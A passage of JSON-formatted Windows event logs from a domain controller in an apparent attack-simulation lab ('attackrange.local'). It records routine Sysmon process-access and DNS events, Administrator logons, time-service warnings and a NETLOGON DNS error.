C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01D3-5F25-0000-0010E0390400}","TargetProcessId":"3316","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":12,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76823,"ProcessID":1224,"ThreadID":2220,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:47:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":134,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76824,"ProcessID":1224,"ThreadID":2000,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient was unable to set a manual peer to use as a time source because of DNS resolution error on 'time.windows.com,0x8'. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: No such host is known. (0x80072AF9)","Opcode":"Info","ErrorMessage":"No such host is known. (0x80072AF9)","RetryMinutes":"15","DomainPeer":"time.windows.com,0x8","EventReceivedTime":"2020-08-01 05:47:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76825,"ProcessID":856,"ThreadID":1272,"Channel":"System","Message":"The W32Time service entered the running state.","param1":"W32Time","param2":"running","EventReceivedTime":"2020-08-01 05:47:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2388,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:01.656\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:01.656","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2389,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:01.656\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:01.656","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:06.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:06.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220305,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-881393\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-881393","Status":"0x0","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220306,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220307,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44227\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x44227","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220308,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44227\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x44227","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:06.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:06.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:06.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:06.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":5774,"SourceName":"NETLOGON","Task":0,"RecordNumber":76826,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"The dynamic registration of the DNS record 'attackrange.local. 600 IN A 10.0.1.14' failed on the following DNS server:  \r\n\r\nDNS server IP address: :: \r\nReturned Response Code (RCODE): 0 \r\nReturned Status Code: 0  \r\n\r\nFor computers and users to locate this domain controller, this record must be registered in DNS.  \r\n\r\nUSER ACTION  \r\nDetermine what might have caused this failure, resolve the problem, and initiate registration of the DNS records by the domain controller. To determine what might have caused this failure, run DCDiag.exe. To learn more about DCDiag.exe, see Help and Support Center. To initiate registration of the DNS records by this domain  controller, run 'nltest.exe /dsregdns' from the command prompt on the domain controller or restart Net Logon service. \r\n  Or, you can manually add this record to DNS, but it is not recommended.  \r\n\r\nADDITIONAL DATA \r\nError Value: Bad DNS packet.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 